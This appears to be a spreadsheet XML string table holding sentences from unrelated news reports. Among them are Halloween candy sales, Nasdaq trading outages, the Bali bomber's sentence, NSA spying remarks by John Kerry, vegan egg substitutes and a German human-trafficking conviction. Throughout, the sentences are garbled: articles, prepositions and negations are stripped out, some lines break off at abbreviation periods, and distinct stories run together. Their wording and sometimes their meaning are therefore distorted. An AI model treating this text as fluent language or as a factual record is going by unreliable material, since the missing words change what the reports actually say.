    <t xml:space="preserve"> That &amp;apos;s great news 41 million trick-or-treaters set take neighborhoods , according U</t>
  </si>
  <si>
    <t xml:space="preserve"> Commerce Department </t>
  </si>
  <si>
    <t xml:space="preserve"> In fact , buy , kidding , consume 90 million pounds chocolate Halloween </t>
  </si>
  <si>
    <t xml:space="preserve"> The one thing &amp;apos;t want consume , candy corn; yet nearly 35 million pounds sold around Halloween , according National Confectioners Association </t>
  </si>
  <si>
    <t xml:space="preserve"> That &amp;apos;s 9 billion individual kernels corn </t>
  </si>
  <si>
    <t xml:space="preserve"> It &amp;apos;s mystery I yet solve </t>
  </si>
  <si>
    <t xml:space="preserve"> Nothing quintessentially Halloween haunted houses </t>
  </si>
  <si>
    <t xml:space="preserve"> They best names , like &amp;quot; Terror Behind Walls &amp;quot; (which , way actual prison), &amp;quot; Howl-O-Scream &amp;quot; &amp;quot; The House Shock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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> &amp;quot; Finally , let &amp;apos;s talk pumpkins </t>
  </si>
  <si>
    <t xml:space="preserve"> Charlie Brown introduced us The Great Pumpkin kids , carving jack-o-lantern like decorating Christmas tree - &amp;apos;s something &amp;apos;ve done since little </t>
  </si>
  <si>
    <t xml:space="preserve"> Lucky us , &amp;quot; baby pumpkin trend &amp;quot; started last year thanks Pinterest , us grew carving gourds sitting </t>
  </si>
  <si>
    <t xml:space="preserve"> This year , Americans spend around $ 106 million pumpkins , according U</t>
  </si>
  <si>
    <t xml:space="preserve"> Census Bureau </t>
  </si>
  <si>
    <t xml:space="preserve"> The jack-o-lantern slowly withering front porch probably came Illinois , grew 542 million pounds pumpkin year </t>
  </si>
  <si>
    <t xml:space="preserve"> If &amp;apos;re looking extra credit , call Tim Susan Mathisdon Napa , Calif </t>
  </si>
  <si>
    <t xml:space="preserve"> , try carve 2,032 pound pumpkin </t>
  </si>
  <si>
    <t xml:space="preserve"> Stock exchange operator Nasdaq OMX keeps customers tenterhooks </t>
  </si>
  <si>
    <t xml:space="preserve"> Trading Nasdaq Options Market interrupted Friday afternoon , German time </t>
  </si>
  <si>
    <t xml:space="preserve"> In announcement , operator cited technical problems reason </t>
  </si>
  <si>
    <t xml:space="preserve"> On eleven options markets , including two also operated Nasdaq OMX , business continued normal </t>
  </si>
  <si>
    <t xml:space="preserve"> The recent incident latest series small large breakdowns suffered stock exchange operator </t>
  </si>
  <si>
    <t xml:space="preserve"> As recently last Tuesday , Nasdaq indices calculated one hour due data transfer errors </t>
  </si>
  <si>
    <t xml:space="preserve"> In August year two breakdowns single week </t>
  </si>
  <si>
    <t xml:space="preserve"> First , US investment bank Goldman Sachs sent large quantities incorrect purchase orders options markets due technical problems </t>
  </si>
  <si>
    <t xml:space="preserve"> As result , stock exchange operators required almost entire day look delete orders </t>
  </si>
  <si>
    <t xml:space="preserve"> Two days later , half stock dealing USA came standstill several hours , due computer failure Nasdaq exchange </t>
  </si>
  <si>
    <t xml:space="preserve"> Furthermore , last year listing Facebook stock exchange caused quite furore </t>
  </si>
  <si>
    <t xml:space="preserve"> The Nasdaq systems could cope flood purchase sales orders , Exchange Supervisory Authority established later date , imposing record penalty 10 million dollars company </t>
  </si>
  <si>
    <t xml:space="preserve"> Piercing beep disturbs residents Rhenus Midgard also invested highly land They stockpile coal arrives ships </t>
  </si>
  <si>
    <t xml:space="preserve"> At time , company also irons fire location </t>
  </si>
  <si>
    <t xml:space="preserve"> Besides coal imports , Rhenus Midgard also active field wind park logistics , among ventures </t>
  </si>
  <si>
    <t xml:space="preserve"> The coals shimmer black storage yard front embankment </t>
  </si>
  <si>
    <t xml:space="preserve"> Here two huge blue stacker reclaimer machines distribute load coals required </t>
  </si>
  <si>
    <t xml:space="preserve"> With movement handling machines , shrill warning noise rings site </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The signals purpose security legally prescribed , &amp;quot; said Matthias Schrell , Managing Director Rhenus Midgard Wilhelmshaven </t>
  </si>
  <si>
    <t xml:space="preserve"> Unfortunately , event unfavourable wind , heard far away - result already number complaints people north town </t>
  </si>
  <si>
    <t xml:space="preserve"> In close consultation authorities , position make warning signals quieter means implementation technical measures </t>
  </si>
  <si>
    <t xml:space="preserve"> In future also seek open dialogue neighbours </t>
  </si>
  <si>
    <t xml:space="preserve"> For Matthias Schrell plans location </t>
  </si>
  <si>
    <t xml:space="preserve"> With construction Lower Saxony Bridge , Rhenus Midgard continuing focus coal exports power stations one major powers sector Europe </t>
  </si>
  <si>
    <t xml:space="preserve"> Thanks mooring basin front terminal , sunken depth 18</t>
  </si>
  <si>
    <t xml:space="preserve">5 metres , time possible unload Capesize bulk carriers </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; In terms handling , year hope break 3 million tonne mark , &amp;quot; said Schrell </t>
  </si>
  <si>
    <t xml:space="preserve"> Alongside local Eon power plant , imported coals also go power plants inland </t>
  </si>
  <si>
    <t xml:space="preserve"> When GDF-Suez plant added network , around 5 million tonnes coal imports per year realistic </t>
  </si>
  <si>
    <t xml:space="preserve"> The three ship unloaders bridge second transport belt could see rise 10 million </t>
  </si>
  <si>
    <t xml:space="preserve"> Anger Bali bomb plotter &amp;apos;s sentence Survivors relatives 202 people killed 2002 Bali bombing reacted anger sentence given last plotters face justice , saying Umar Patek face firing squad </t>
  </si>
  <si>
    <t xml:space="preserve"> Patek , spent almost 10 years run one South-East Asia &amp;apos;s wanted , yesterday sentenced 20 years jail role building explosive devices used bombing </t>
  </si>
  <si>
    <t xml:space="preserve"> He could released within 15 years granted parole </t>
  </si>
  <si>
    <t xml:space="preserve"> He also found guilty number terrorism-related charges , including wave bombings churches across Indonesia Christmas Eve 2000 </t>
  </si>
  <si>
    <t xml:space="preserve"> Prosecutors demanded life sentence , although could pushed man dubbed &amp;quot; Demolition Man &amp;quot; reputation master bomb-maker sentenced death </t>
  </si>
  <si>
    <t xml:space="preserve"> The decision reignited painful memories Perth mother June Corteen , lost 39-year-old twin daughters Jane Jenny destruction unleashed Patek co-conspirators almost decade ago </t>
  </si>
  <si>
    <t xml:space="preserve"> Fighting back tears , said Patek sentenced death </t>
  </si>
  <si>
    <t xml:space="preserve"> I really feel follow footsteps guys </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; He put front firing squad , &amp;quot; Ms Corteen told AAP </t>
  </si>
  <si>
    <t xml:space="preserve"> I live every day without seeing grandchildren , daughters </t>
  </si>
  <si>
    <t xml:space="preserve"> The Sari Club levelled massive bomb loaded van parked outside detonated 11pm October 12 , 2002 </t>
  </si>
  <si>
    <t xml:space="preserve"> Peter Hughes Paddy &amp;apos;s Bar suicide bomber detonated backpack loaded explosives 20 seconds earlier </t>
  </si>
  <si>
    <t xml:space="preserve"> He lapsed month-long coma wake bombing , &amp;quot; died &amp;quot; three times life support </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Hughes said Patek shared fate three members Jemaah Islamiah terror cell responsible carnage - Amrozi , Mukhlas Imam Samudra - executed four years ago </t>
  </si>
  <si>
    <t xml:space="preserve"> Really , guy get death penalty anybody </t>
  </si>
  <si>
    <t xml:space="preserve"> To keep alive , well , &amp;apos;s reason keep alive </t>
  </si>
  <si>
    <t xml:space="preserve"> To get 20 years , killing 202 people injuring many hundreds , &amp;apos;s much </t>
  </si>
  <si>
    <t xml:space="preserve"> Patek last Bali bombers face justice </t>
  </si>
  <si>
    <t xml:space="preserve"> He avoided capture almost decade eventually apprehended January 2011 Pakistani town Abbottabad , US forces killed former al-Qaeda chief Osama bin Laden less four months later </t>
  </si>
  <si>
    <t xml:space="preserve"> During trial , FBI agent testified intelligence reports revealed Patek Pakistan meet bin Laden effort re-establish links South-East Asian terrorist groups al-Qaeda </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; He &amp;apos;t give , &amp;quot; Ms Corteen said </t>
  </si>
  <si>
    <t xml:space="preserve"> Until recently , really &amp;apos;t feel sorry much grief caused people </t>
  </si>
  <si>
    <t xml:space="preserve"> The verdict comes ahead 10th anniversary attack later year , marked ceremonies Bali Australia </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; There lot tears year , &amp;quot; Ms Corteen said </t>
  </si>
  <si>
    <t xml:space="preserve"> Patek may yet appeal sentence </t>
  </si>
  <si>
    <t xml:space="preserve"> Nothing beats Germany property location national international investors </t>
  </si>
  <si>
    <t xml:space="preserve"> The economic situation right , financing options fantastic </t>
  </si>
  <si>
    <t xml:space="preserve"> This message 9th &amp;apos; Immobilientag &amp;apos; (Property Day) organised Börsen Zeitung (stock exchange newspaper)</t>
  </si>
  <si>
    <t xml:space="preserve"> The German property markets benefiting country &amp;apos;s economic strength general conditions , compared rest Europe , competitive </t>
  </si>
  <si>
    <t xml:space="preserve"> This pointed Christian Ulbrich , Jones Lang LaSalle CEO Europe , Near East Africa , 9th &amp;apos; Immobilientag &amp;apos; (Property Day) organised Börsen Zeitung (stock exchange newspaper)</t>
  </si>
  <si>
    <t xml:space="preserve"> The extent German commercial properties sought evident transaction volumes , said Ulbrich </t>
  </si>
  <si>
    <t xml:space="preserve"> In first three quarters year , increase 31% compared period year </t>
  </si>
  <si>
    <t xml:space="preserve"> In Great Britain , growth stands 6% , France 19% </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Property investments offer attractive rate return , &amp;quot; said Ulbrich </t>
  </si>
  <si>
    <t xml:space="preserve"> The yield gap properties federal government bonds historically high level </t>
  </si>
  <si>
    <t xml:space="preserve"> Sayings come Bible At least 40 women attended last women &amp;apos;s breakfast year , Evangelical Parish Bisingen </t>
  </si>
  <si>
    <t xml:space="preserve"> The theme day parish hall &amp;quot; Sayings Bible &amp;quot; &amp;quot; Expressions Middle Ages &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> Zita Köhler , Chairperson Parish Council , agreed give talk Biblical proverbs breakfast </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Proverbs contain pearls wisdom , commandments warnings , &amp;quot; explained </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</si>
  <si>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Hände Unschuld waschen &amp;quot; (to wash one &amp;apos;s hands something)</t>
  </si>
  <si>
    <t xml:space="preserve"> On several occasions , speaker asked listening guess proverb based </t>
  </si>
  <si>
    <t xml:space="preserve"> Expressions Middle Ages addressed Parish Councillor Christel Dehner: &amp;quot; Aller guten Dinge sind drei &amp;quot; (All good things come threes), &amp;quot; blau machen &amp;quot; (to skip school / work), &amp;quot; etwas verhauen &amp;quot; (to wallop something)</t>
  </si>
  <si>
    <t xml:space="preserve"> To round morning tombola </t>
  </si>
  <si>
    <t xml:space="preserve"> The prizes placed , covered , table humorously paraphrased prior presented winners </t>
  </si>
  <si>
    <t xml:space="preserve"> Mayoral candidate Roman Waizenegger also found among visitors joint breakfast </t>
  </si>
  <si>
    <t xml:space="preserve"> On last weekend August , Vogtsbauernhof Black Forest Open Air Museum Gutach near Hornberg firmly hands children </t>
  </si>
  <si>
    <t xml:space="preserve"> Traditionally , museum welcomes visitors Saturday Sunday , year 24 25 August , colourful party children families part summer holiday programme , numerous participation activities events </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; On days , adults children alike learn various traditional handicrafts , &amp;quot; said press release </t>
  </si>
  <si>
    <t xml:space="preserve"> Whether producing soap , turning candles , felting making silk , suitable activity whatever age </t>
  </si>
  <si>
    <t xml:space="preserve"> The children receive help regional artisans , present 11</t>
  </si>
  <si>
    <t>00 a</t>
  </si>
  <si>
    <t xml:space="preserve"> 5: 00 p</t>
  </si>
  <si>
    <t xml:space="preserve"> Activities also taking place museum workshop </t>
  </si>
  <si>
    <t xml:space="preserve"> The young guests able demonstrate manual skills building cuckoo pipes , water wheels spinning tops </t>
  </si>
  <si>
    <t xml:space="preserve"> The host old games , wheelbarrow racing walking stilts , promises plenty fun </t>
  </si>
  <si>
    <t xml:space="preserve"> Here speed coordination order day </t>
  </si>
  <si>
    <t xml:space="preserve"> For miniature detectives , open air museum offering mystery tour museum Saturday Sunday , midday 2</t>
  </si>
  <si>
    <t xml:space="preserve"> respectively </t>
  </si>
  <si>
    <t xml:space="preserve"> On tour premises , children work stories true made </t>
  </si>
  <si>
    <t xml:space="preserve"> In addition , visitors special opportunity get know open air museum carriage journey drawn Black Forest Chestnut horses </t>
  </si>
  <si>
    <t xml:space="preserve"> It horses found admired grounds , many animals sheep , goats , cows chickens well </t>
  </si>
  <si>
    <t xml:space="preserve"> On Sunday children also able enjoy clown , Otsch , pranks museum guests 11</t>
  </si>
  <si>
    <t xml:space="preserve"> Meanwhile , cosy magical alternative provided Hermann Büttner </t>
  </si>
  <si>
    <t xml:space="preserve"> The story-teller taking younger guests wonderful world fairytale 11</t>
  </si>
  <si>
    <t xml:space="preserve"> , 1: 00 p</t>
  </si>
  <si>
    <t xml:space="preserve"> 3: 00 p</t>
  </si>
  <si>
    <t xml:space="preserve"> The traditional children &amp;apos;s dance group Gutach also performing 11: 30 a</t>
  </si>
  <si>
    <t xml:space="preserve"> Furthermore , event days , 11</t>
  </si>
  <si>
    <t xml:space="preserve"> , numerous artisans broom maker , sewer , spinner , weaver baker letting visitors look shoulders </t>
  </si>
  <si>
    <t xml:space="preserve"> So , visitors open air museum expect varied holiday programme right end summer holidays Baden-Wuerttemberg </t>
  </si>
  <si>
    <t xml:space="preserve"> An overview milk egg alternatives Vegan nutrition promotes vegetable alternatives eggs , milk dairy products </t>
  </si>
  <si>
    <t xml:space="preserve"> Mashed tofu plant cream , example , serves substitute quark cheese </t>
  </si>
  <si>
    <t xml:space="preserve"> The Vegetarian Association provide examples World Vegan Day 1 November </t>
  </si>
  <si>
    <t xml:space="preserve"> On occasion World vegan Day 1 November , Vegetarian Association Germany propose host vegan alternatives: Pure plant margarine good alternative butter , yoghurt replaced soya yoghurt </t>
  </si>
  <si>
    <t xml:space="preserve"> Soya , oat , almond rice milk used place milk </t>
  </si>
  <si>
    <t xml:space="preserve"> Plant whipping cream replace traditional whipping cream </t>
  </si>
  <si>
    <t xml:space="preserve"> There also plant alternatives eggs </t>
  </si>
  <si>
    <t xml:space="preserve"> Half mashed , ripe banana , example , replace egg binding agent cake </t>
  </si>
  <si>
    <t xml:space="preserve"> 50 grams apple sauce tablespoon ground linseed plus three tablespoons water also suitable </t>
  </si>
  <si>
    <t xml:space="preserve"> A dough becomes fluffy replacing egg mixture one tablespoon baking powder , one tablespoon cornflour three tablespoons mineral water , example </t>
  </si>
  <si>
    <t xml:space="preserve"> 50 grams soya yoghurt silken tofu also fulfil purpose </t>
  </si>
  <si>
    <t xml:space="preserve"> According information Vegetarian Association , around 800,000 Germans currently vegan diet , i</t>
  </si>
  <si>
    <t xml:space="preserve"> 100% vegetable diet </t>
  </si>
  <si>
    <t xml:space="preserve"> John Kerry says US spying &amp;quot; reached far inappropriately &amp;quot; unprecedented admission John Kerry indicated softening U</t>
  </si>
  <si>
    <t xml:space="preserve">S &amp;apos;s defensive stance surveillance programmes unprecedented admission occasions spying &amp;quot; reached far inappropriately </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The Secretary State also admitted &amp;apos;d guilty , along Barack Obama , &amp;quot; automatic pilot &amp;quot; incendiary revelations whistleblower Edward Snowden NSA &amp;apos;s spying activities emerged </t>
  </si>
  <si>
    <t xml:space="preserve"> The leaks put US government centre diplomatic storm allies </t>
  </si>
  <si>
    <t xml:space="preserve"> Speaking open government conference London via video link , Mr Kerry said: &amp;quot; There question President I others government actually learned things happening automatic pilot ability , going back World War Two difficult years Cold War , , course , 9 / 11 </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; He became first high-ranking member U</t>
  </si>
  <si>
    <t xml:space="preserve">S government admit US spying crossed line , emphasised one &amp;apos;s rights abused </t>
  </si>
  <si>
    <t xml:space="preserve"> He said: &amp;quot; In cases , reached far inappropriately </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; And President determined try clarify make clear people thorough review order nobody sense abuse </t>
  </si>
  <si>
    <t xml:space="preserve"> I assure innocent people abused process </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Kerry insisted , however , NSA force good surveillance operations saved many lives </t>
  </si>
  <si>
    <t xml:space="preserve"> He added: &amp;quot; We &amp;apos;re dealing new world people willing blow </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; There radical extremism world hell-bent determined try kill people blow people attack governments </t>
  </si>
  <si>
    <t xml:space="preserve"> So able intercept stop happens ? We actually prevented airplanes going , buildings blown , people assassinated &amp;apos;ve able learn ahead time plans </t>
  </si>
  <si>
    <t xml:space="preserve"> Meanwhile , U</t>
  </si>
  <si>
    <t xml:space="preserve"> lawmakers head Europe help address concerns abroad alleged U</t>
  </si>
  <si>
    <t xml:space="preserve"> spying convince Europeans need continue joint anti-terrorism efforts U</t>
  </si>
  <si>
    <t xml:space="preserve"> , chairman Senate subcommittee European affairs said Thursday </t>
  </si>
  <si>
    <t xml:space="preserve"> Senator Chris Murphy Connecticut said spoke European Parliament members others week concerned threats stop participating anti-terrorist organizations frustration surveillance National Security Agency </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It &amp;apos;s really important U</t>
  </si>
  <si>
    <t xml:space="preserve"> national security interests Europeans stay board us respect mutual anti-terrorism endeavors , &amp;quot; Murphy , first-term Democrat chairman Senate Foreign Relations Subcommittee European Affairs , said interview Washington </t>
  </si>
  <si>
    <t xml:space="preserve"> And I &amp;apos;m going Europe make clear need continue work together combatting terrorism , notwithstanding anger NSA programs </t>
  </si>
  <si>
    <t xml:space="preserve"> News reports NSA swept millions phone records Europe frayed relations U</t>
  </si>
  <si>
    <t xml:space="preserve"> allies , though agency &amp;apos;s chief said week inaccurate reflected misunderstanding metadata Nato allies collected shared United States </t>
  </si>
  <si>
    <t xml:space="preserve"> Other revelations cited documents leaked Snowden NSA monitored German Chancellor Angela Merkel &amp;apos;s cellphone 34 world leaders </t>
  </si>
  <si>
    <t xml:space="preserve"> The national intelligence director , James Clapper , defended spying allies necessary said &amp;apos;s commonplace sides </t>
  </si>
  <si>
    <t xml:space="preserve"> Amid uproar , Murphy said office arranging congressional trip , expected take place year , hopes delegation include members parties chambers </t>
  </si>
  <si>
    <t xml:space="preserve"> Names participating lawmakers released coming days </t>
  </si>
  <si>
    <t xml:space="preserve"> He said itinerary still worked </t>
  </si>
  <si>
    <t xml:space="preserve"> While Murphy said purpose trip help improve relationships , said &amp;quot; tough love &amp;quot; also dispensed </t>
  </si>
  <si>
    <t xml:space="preserve"> He said European leaders need honest people kind espionage programs &amp;apos;ve used years </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; While amend surveillance programs better protect rights Europeans , also need come terms fact &amp;apos;re ones spying , &amp;quot; Murphy said </t>
  </si>
  <si>
    <t xml:space="preserve"> Meanwhile , Mr Kerry scheduled head weekend Middle East Poland address rancor U</t>
  </si>
  <si>
    <t xml:space="preserve"> strategies Syria , Egypt Iran well U</t>
  </si>
  <si>
    <t xml:space="preserve"> surveillance activities </t>
  </si>
  <si>
    <t xml:space="preserve"> Union SPD continued coalition negotiations , addressing topics internal affairs justice </t>
  </si>
  <si>
    <t xml:space="preserve"> To end , competent working group met morning </t>
  </si>
  <si>
    <t xml:space="preserve"> Among issues , topics discussed included direct democracy , bribery MPs Federal Police </t>
  </si>
  <si>
    <t xml:space="preserve"> During morning , Migration Integration working group also sought continue discussions </t>
  </si>
  <si>
    <t xml:space="preserve"> Among issues addressed dual nationality , regard sides opposing ideas </t>
  </si>
  <si>
    <t xml:space="preserve"> The SPD would like put end pressure placed immigrant children decide one nationality - Union rejects notion dual passport </t>
  </si>
  <si>
    <t xml:space="preserve"> Regarding subject traffic , agenda Friday , SPD substantiated opposition car toll charge promoted CSU </t>
  </si>
  <si>
    <t xml:space="preserve"> A toll road sticker would amount &amp;quot; flat rate fee frequent drivers would thus environmentally counterproductive , &amp;quot; explained SPD negotiator issues relating traffic , Florian Pronold , letter parliamentary group </t>
  </si>
  <si>
    <t xml:space="preserve"> There would threat diverted traffic country roads , already accident hotspots </t>
  </si>
  <si>
    <t xml:space="preserve"> The introduction toll cars would also first step , Pronold &amp;apos;s eyes </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; There risk compensation Germans would abolished later point time , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> Mick Jagger says never hit Katy Perry 18 </t>
  </si>
  <si>
    <t xml:space="preserve"> During interview Australian radio show week , pop star said sang backing vocals Jagger &amp;apos;s 2004 song &amp;quot; Old Habits Die Hard </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Perry said dinner veteran rocker &amp;quot; hit I 18 </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; She added , &amp;quot; That long time ago , &amp;apos;s kind </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; In statement Thursday , representative Jagger , 70 , says &amp;quot; categorically denies ever made pass Katy Perry </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The rep adds: &amp;quot; Perhaps confusing someone else </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Perry one singers make guest appearance Rolling Stones &amp;apos; tour year </t>
  </si>
  <si>
    <t xml:space="preserve"> Her new album , &amp;quot; Prism , &amp;quot; debuted No</t>
  </si>
  <si>
    <t xml:space="preserve"> 1 week </t>
  </si>
  <si>
    <t xml:space="preserve"> Konstanz: Cyclist knocks 63-year-old man According police , accident occurred Thursday evening around 10: 00 p</t>
  </si>
  <si>
    <t xml:space="preserve"> , 26-year-old man cycling illegally , left footpath Bahnhofplatz direction Marktstätte , ladies bicycle </t>
  </si>
  <si>
    <t xml:space="preserve"> According police , 63-year-old man suddenly stepped pub onto footpath , cyclist unable brake time </t>
  </si>
  <si>
    <t xml:space="preserve"> During subsequent collision , pedestrian thrown wall building , fell onto ground , suffering laceration head measured around 15 centimetres length </t>
  </si>
  <si>
    <t xml:space="preserve"> An ambulance team brought injured man clinic medical treatment </t>
  </si>
  <si>
    <t xml:space="preserve"> Oil extends drop toward $ 96 barrel The price oil continued fall Friday concerns high supplies offset report showing China &amp;apos;s power-hungry manufacturing sector strengthening </t>
  </si>
  <si>
    <t xml:space="preserve"> Benchmark U</t>
  </si>
  <si>
    <t xml:space="preserve"> crude December delivery 14 cents $ 96</t>
  </si>
  <si>
    <t xml:space="preserve">24 barrel late morning Europe electronic trading New York Mercantile Exchange </t>
  </si>
  <si>
    <t xml:space="preserve"> The contract fell 39 cents Thursday , leaving 5</t>
  </si>
  <si>
    <t xml:space="preserve">8 percent month October </t>
  </si>
  <si>
    <t xml:space="preserve"> Ample supplies crude weighed price recent weeks </t>
  </si>
  <si>
    <t xml:space="preserve"> The Energy Department said Wednesday U</t>
  </si>
  <si>
    <t xml:space="preserve"> supplies increased 4</t>
  </si>
  <si>
    <t xml:space="preserve">1 million barrels last week </t>
  </si>
  <si>
    <t xml:space="preserve"> Over five weeks , supplies risen 25 million barrels </t>
  </si>
  <si>
    <t xml:space="preserve"> But suggestion stronger demand came Friday two reports Chinese manufacturing showed uptick activity </t>
  </si>
  <si>
    <t xml:space="preserve"> That suggests China &amp;apos;s economic recovery could continue strengthen growth rebounded 7</t>
  </si>
  <si>
    <t xml:space="preserve">8 percent third quarter two-decade low previous quarter </t>
  </si>
  <si>
    <t xml:space="preserve"> Brent crude , benchmark international crude also used U</t>
  </si>
  <si>
    <t xml:space="preserve"> refineries , fell 26 cents $ 108</t>
  </si>
  <si>
    <t xml:space="preserve">58 barrel ICE exchange London </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> So far , candidate succeed Mayor Norbert Brugger , longer running account age , 46-year-old banker business economist Dieter Köpfler Löffingen </t>
  </si>
  <si>
    <t xml:space="preserve"> The deadline applications Monday 11 November , 6: 00 p</t>
  </si>
  <si>
    <t xml:space="preserve"> New anti-nicotine vaccine could take pleasure smoking Scientists developed anti-nicotine vaccine could take pleasure smoking cigarette </t>
  </si>
  <si>
    <t xml:space="preserve"> A single dose vaccine able protect mice nicotine addiction life </t>
  </si>
  <si>
    <t xml:space="preserve"> Further tests needed starting human trials , would take several years , Professor Ronald Crystal Weill Cornell Medical College New York said early signs good </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We hopeful kind vaccine strategy finally help millions smokers tried stop , exhausting methods market today , find nicotine addiction strong enough overcome current approaches , &amp;quot; Prof Cornell said </t>
  </si>
  <si>
    <t xml:space="preserve"> The new vaccine contains harmless virus engineered carry genetic information make anti-nicotine antibodies </t>
  </si>
  <si>
    <t xml:space="preserve"> The virus selectively infects liver cells , start make steady stream antibodies </t>
  </si>
  <si>
    <t xml:space="preserve"> The antibodies hunt nicotine molecules bloodstream , neutralising reached brain , preventing smoker getting nicotine hit </t>
  </si>
  <si>
    <t xml:space="preserve"> In tests , vaccinated mice subsequently given nicotine continued normal activity </t>
  </si>
  <si>
    <t xml:space="preserve"> But mice given vaccine &amp;quot; chilled , &amp;quot; say researchers , sign nicotine reached brains </t>
  </si>
  <si>
    <t xml:space="preserve"> The experiments described journal Science Translational Medicine </t>
  </si>
  <si>
    <t xml:space="preserve"> Previous tobacco vaccines failed contained antibodies </t>
  </si>
  <si>
    <t xml:space="preserve"> The jabs given frequently keep antibody levels topped proved expensive impractical </t>
  </si>
  <si>
    <t xml:space="preserve"> But cost new vaccine likely far lower , turns liver cells antibody factories </t>
  </si>
  <si>
    <t xml:space="preserve"> Prof Crystal said future human vaccine completely safe could given children tempted try cigarette , preventing nicotine addiction </t>
  </si>
  <si>
    <t xml:space="preserve"> But likely would used smokers quit </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; They know start smoking , receive pleasure due nicotine vaccine , help kick habit , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> British scientists said results interesting warned far research needed </t>
  </si>
  <si>
    <t xml:space="preserve"> Egypt swears first freely elected president Mohamed Morsi takes oath office day triumph unlikely mark end political strife Egypt </t>
  </si>
  <si>
    <t xml:space="preserve"> ISLAMIST Mohamed Morsi promised &amp;quot; new Egypt &amp;quot; took oath office become country &amp;apos;s first freely elected president , succeeding Hosni Mubarak ousted 16 months ago </t>
  </si>
  <si>
    <t xml:space="preserve"> At inauguration Supreme Constitutional Court , Morsi also became Arab world &amp;apos;s first freely elected Islamist president Egypt &amp;apos;s fifth head state since overthrow monarchy 60 years ago </t>
  </si>
  <si>
    <t xml:space="preserve"> He took oath court &amp;apos;s 18 black-robed judges Nile-side seat built resemble ancient Egyptian temple </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We aspire better tomorrow , new Egypt second republic , &amp;quot; Morsi said solemn ceremony shown live state television </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</si>
  <si>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targeted successive governments </t>
  </si>
  <si>
    <t xml:space="preserve"> Hundreds soldiers policemen guarded building Morsi arrived shortly 11am local time small motorcade </t>
  </si>
  <si>
    <t xml:space="preserve"> Only several hundred supporters gathered outside court cheer new president , departure presidential pomp Mubarak years , traffic briefly halted allow motorcade usually busy road linking city centre southern suburbs </t>
  </si>
  <si>
    <t xml:space="preserve"> Derided Brotherhood &amp;apos;s uncharismatic &amp;quot; spare tyre , &amp;quot; personal prestige surged since victory delivery Friday speech tried present candidate Islamists want complete work 2011 uprising authoritarian Mubarak </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Egypt today civil , national , constitutional modern state , &amp;quot; Morsi , wearing blue business suit red tie , told judges wood-panelled chamber took oath office </t>
  </si>
  <si>
    <t xml:space="preserve"> Morsi later travelled Cairo University make inauguration address </t>
  </si>
  <si>
    <t xml:space="preserve"> He given official welcome army band played national anthem stood attention </t>
  </si>
  <si>
    <t xml:space="preserve"> Military ruler Field Marshal Hussein Tantawi attendance </t>
  </si>
  <si>
    <t xml:space="preserve"> His arrival greeted chants , &amp;quot; The army people one hand , &amp;quot; hundreds gathered university &amp;apos;s main lecture room </t>
  </si>
  <si>
    <t xml:space="preserve"> Established 1908 bastion secular education , Cairo University later became stronghold Islamist student groups 1970s </t>
  </si>
  <si>
    <t xml:space="preserve"> Morsi took symbolic oath Friday Tahrir Square , birthplace uprising ended Mubarak &amp;apos;s authoritarian rule last year , vowed reclaim presidential powers stripped office military council took ousted leader </t>
  </si>
  <si>
    <t xml:space="preserve"> But agreeing take official oath court , rather parliament customary , bowing military &amp;apos;s indication contest power continue </t>
  </si>
  <si>
    <t xml:space="preserve"> Morsi &amp;apos;s speech Tahrir Square filled dramatic populist gestures </t>
  </si>
  <si>
    <t xml:space="preserve"> Pimp must go prison The District Court Constance condemned 33-year-old man St</t>
  </si>
  <si>
    <t xml:space="preserve"> Georgen three half years prison exploitative human trafficking , pimping , issuing threats grievous bodily harm </t>
  </si>
  <si>
    <t xml:space="preserve"> The former German soldier , following two tours Afghanistan , worked doorman , made confession within context plea-bargaining procedure </t>
  </si>
  <si>
    <t xml:space="preserve"> According confession , five occasions got know women via Internet telephone contacts , sent onto streets weeks </t>
  </si>
  <si>
    <t xml:space="preserve"> He broke resistance means violence issuing threats </t>
  </si>
  <si>
    <t xml:space="preserve"> He kept income women , worked years </t>
  </si>
  <si>
    <t xml:space="preserve"> He prevented women making contact outside world confiscating mobile phones SIM cards </t>
  </si>
  <si>
    <t xml:space="preserve"> Together accomplice , procured women , brought various brothels south-west </t>
  </si>
  <si>
    <t xml:space="preserve"> There monitored extent , order control income </t>
  </si>
  <si>
    <t xml:space="preserve"> Appearing court , accused initially claimed suffering severe trauma colleagues serving alongside Afghanistan lost lives explosion </t>
  </si>
  <si>
    <t xml:space="preserve"> Once psychiatric expert cast considerable doubt suffering psychiatric condition , thus limited culpability , 33-year-old made full confession </t>
  </si>
  <si>
    <t xml:space="preserve"> The court question female victims </t>
  </si>
  <si>
    <t xml:space="preserve"> As official Criminal Investigation Department reported , following first conviction achieved using telephone surveillance measures , least four cases exploitative human trafficking could identified </t>
